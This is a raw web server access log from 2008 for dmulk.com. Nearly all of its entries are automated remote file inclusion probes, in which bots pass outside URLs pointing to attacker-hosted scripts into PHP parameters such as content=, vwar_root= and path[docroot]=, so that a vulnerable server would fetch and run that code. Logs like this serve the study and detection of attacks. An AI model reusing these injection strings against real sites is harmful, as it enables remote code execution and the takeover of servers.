89.111.176.106 - - [31/Aug/2008:09:00:16 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:09:00:16 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [31/Aug/2008:09:00:17 -0700] "GET /logs/access_080518.log/plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.70.114 - - [31/Aug/2008:09:00:31 -0700] "GET /logs/access_080811.log/index.php?redir=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.103.152.139 - - [31/Aug/2008:09:00:34 -0700] "GET /logs/access_080223.log/?path%5Bdocroot%5D=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.103.152.139 - - [31/Aug/2008:09:00:35 -0700] "GET /logs/?path%5Bdocroot%5D=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 200 63000 "-" "libwww-perl/5.805" "www.dmulk.com"
212.103.152.139 - - [31/Aug/2008:09:00:35 -0700] "GET /logs/access_080225.log/?path%5Bdocroot%5D=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.103.152.139 - - [31/Aug/2008:09:00:36 -0700] "GET /?path%5Bdocroot%5D=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 200 89487 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.70.114 - - [31/Aug/2008:09:00:36 -0700] "GET /index.php?redir=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 200 89467 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.4.30 - - [31/Aug/2008:09:00:48 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [31/Aug/2008:09:00:48 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:01:00 -0700] "GET /mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:01:00 -0700] "GET /logs/access_080218.log/mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:01:00 -0700] "GET /logs/mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:01:03 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:01:03 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:09:01:24 -0700] "GET /logs/access_080303.log/mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.57.24 - - [31/Aug/2008:09:01:32 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.24 - - [31/Aug/2008:09:01:33 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.31.236.242 - - [31/Aug/2008:09:01:34 -0700] "GET //loc.php?l=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.31.236.242 - - [31/Aug/2008:09:01:36 -0700] "GET /logs//loc.php?l=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.53 - - [31/Aug/2008:09:01:38 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [31/Aug/2008:09:01:39 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:01:51 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:01:51 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.137.82 - - [31/Aug/2008:09:02:03 -0700] "GET /logs/index.php?redir=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [31/Aug/2008:09:02:03 -0700] "GET /logs/access_080815.log/index.php?redir=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [31/Aug/2008:09:02:03 -0700] "GET /logs/access_080404.log/index.php?redir=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [31/Aug/2008:09:02:04 -0700] "GET /index.php?redir=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.1" 200 89507 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.4.30 - - [31/Aug/2008:09:02:21 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [31/Aug/2008:09:02:21 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:02:37 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:02:37 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:02:37 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:02:37 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:02:37 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:02:37 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:02:46 -0700] "GET /logs/access_080526.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:02:47 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:02:47 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:02:47 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:02:52 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:02:52 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:02:52 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:02:53 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:02:53 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:02:53 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:02:53 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:02:53 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:02:53 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [31/Aug/2008:09:03:07 -0700] "GET /logs/access_080808.log%20/inc/header.php/step_one.php?server_inc=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:03:17 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:03:17 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:03:26 -0700] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:03:26 -0700] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:03:27 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:03:28 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.172.148.42 - - [31/Aug/2008:09:03:29 -0700] "GET /logs/access_071111.log//index.php?seite=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:03:29 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.172.148.42 - - [31/Aug/2008:09:03:30 -0700] "GET //index.php?seite=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 200 89532 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.172.148.42 - - [31/Aug/2008:09:03:34 -0700] "GET /logs/access_080116.log//index.php?seite=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:03:37 -0700] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:03:39 -0700] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:03:41 -0700] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:03:41 -0700] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.4.30 - - [31/Aug/2008:09:03:55 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [31/Aug/2008:09:03:55 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:03:56 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:03:56 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:03:57 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:03:57 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:03:57 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:03:57 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:04:06 -0700] "GET /logs/access_080412.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.131.81 - - [31/Aug/2008:09:04:11 -0700] "GET /logs/index.php?redir=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.103.131.81 - - [31/Aug/2008:09:04:12 -0700] "GET /index.php?redir=http://vobucks.com/bo.do?? HTTP/1.1" 200 89402 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:04:17 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:04:17 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:04:17 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:04:18 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:04:18 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:04:18 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:04:28 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:04:28 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:04:31 -0700] "GET /logs/access_080303.log/mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:09:04:40 -0700] "GET /logs/access_080820.log//includes/header.php?c_temp_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:09:04:41 -0700] "GET //includes/header.php?c_temp_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:09:04:41 -0700] "GET /logs//includes/header.php?c_temp_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:09:04:42 -0700] "GET /logs/access_080528.log//includes/header.php?c_temp_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:04:49 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:04:49 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:04:49 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:09:04:51 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:09:04:51 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.73.182.47 - - [31/Aug/2008:09:04:57 -0700] "GET /print.php?pager=http://titureddo.altervista.org/vacanze/pinogino.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:04:57 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:04:57 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.182.47 - - [31/Aug/2008:09:04:59 -0700] "GET /logs/print.php?pager=http://titureddo.altervista.org/vacanze/pinogino.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:05:00 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:05:00 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:05:05 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:05:06 -0700] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:05:06 -0700] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.208 - - [31/Aug/2008:09:05:09 -0700] "GET /blog HTTP/1.1" 301 85 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.67.208 - - [31/Aug/2008:09:05:10 -0700] "GET /blog/ HTTP/1.1" 200 89138 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:05:12 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:05:12 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:05:22 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:05:22 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:05:22 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:05:25 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:05:25 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:05:25 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:05:27 -0700] "GET /logs//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:05:28 -0700] "GET //include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:09:05:45 -0700] "GET /logs/access_080201.log/mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:05:49 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:05:49 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:05:49 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:05:54 -0700] "GET /logs/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:05:54 -0700] "GET /mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:06:00 -0700] "GET /logs/access_080526.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:06:09 -0700] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:06:11 -0700] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:06:12 -0700] "GET /logs/access_080201.log/mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:06:15 -0700] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:06:15 -0700] "GET /logs//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:06:15 -0700] "GET //include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.70.32.7 - - [31/Aug/2008:09:06:23 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.70.32.7 - - [31/Aug/2008:09:06:23 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
